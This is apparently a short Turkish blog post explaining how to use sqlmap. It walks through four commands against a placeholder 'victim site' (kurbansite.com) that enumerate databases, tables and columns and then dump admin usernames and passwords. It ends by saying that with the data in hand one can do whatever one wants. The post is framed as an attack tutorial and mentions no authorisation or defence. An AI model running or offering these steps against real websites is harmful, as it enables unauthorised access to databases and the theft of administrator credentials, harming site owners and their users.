Sqlmap Nedir?
Sqlmap SQL açıklı sitelerin sayfasını tarayıp size admin panelinin şifresini veya site hakkında bigi verir.
Kullanımı zor gibi gözüksede çok basittir.Ben linux için anlatacağım.
1.İlkten Datamızı çekmemiz gerekir
sqlmap -u https://www.kurbansite.com/?page_id=128&lang=TH(mesala) --dbs -batch
2.Olarak çektiğimiz datanın tablosunu cıkarmamız gerek.
sqlmap -u https://www.kurbansite.com/?page_id=128&lang=TH(mesala) -D (data ismi) --tables
3.Olarak Sıra Tabloyu çekmekte
sqlmap -u https://www.kurbansite.com/?page_id=128&lang=TH(mesala) -D (data ismi) -T(tabloismi) --column
4.Olarak Columnu Cektik
Mesala Columnda admin name ve password var .Bunları Nasıl Öğreniriz tabiki dataları --dump edeceğiz. sqlmap -u https://www.kurbansite.com/?page_id=128&lang=TH(mesala) -D (data ismi) -T ( tablo ismi) -C name,password --dump
Artık Veriler elimizde olduğu için ne istersek yapabiliriz.
Yorumlar
Yorum Gönder